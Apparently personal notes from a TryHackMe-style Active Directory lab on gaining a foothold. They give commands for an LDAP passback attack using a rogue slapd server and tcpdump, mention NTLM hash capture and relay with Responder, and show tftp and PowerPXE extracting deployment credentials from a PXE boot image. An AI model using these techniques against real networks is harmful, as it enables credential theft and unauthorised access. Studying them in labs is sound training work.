1. Getting Foothold
Brute Forcing NetNTLM
Internet facing applications may have their authentication tied back to an AD. If we manage to brute force these credentials, we may have access to the server

LDAP Passback attack
If we have access to a page with LDAP configurations and password censored out, we can setup our own LDAP server to intercept the traffic and obtain the password

$ sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
$ sudo dpkg-reconfigure -p low slapdCreate a olcSaslSecProps.ldif file
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcredPatch the existing LDAP file with the created file
$ sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restartRun TCPdump and click Test Settings to send the request
$ sudo tcpdump -SX -i <interface> tcp port 389SMB Auth Relay
Use Responderto intercept NTLM authentication traffic.
After we get the NTLM hash, we can either
Crack the hash
Relay the hash and MITM the process of getting a TGS. For this to happen, SMB signing needs be disabled, or enabled but not enforced.
Microsoft Development Toolkit
Extracting credentials preloaded in the PXE boot image
Downloading the BCD file from the MDT site
C:\Users\THM\Documents\Am0> tftp -i <THMMDT IP> GET "\Tmp\x64{39...28}.bcd" conf.bcdGetting the location of the wim file
C:\Users\THM\Documents\Am0> powershell -executionpolicy bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\THM\Documents\am0> Import-Module .\PowerPXE.ps1
PS C:\Users\THM\Documents\am0> $BCDFile = "conf.bcd"
PS C:\Users\THM\Documents\am0> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wimDownload the WIM file and extract credentials
PS C:\Users\THM\Documents\am0> tftp -i <THMMDT IP> GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim
Transfer successful: 341899611 bytes in 218 second(s), 1568346 bytes/sPS C:\Users\THM\Documents\am0> Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = <account>
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = <password>Configuration files
If we already have access to the host machine, search for artifacts that may contain credentials
Configuration files
Data stores
Password stores
Last updated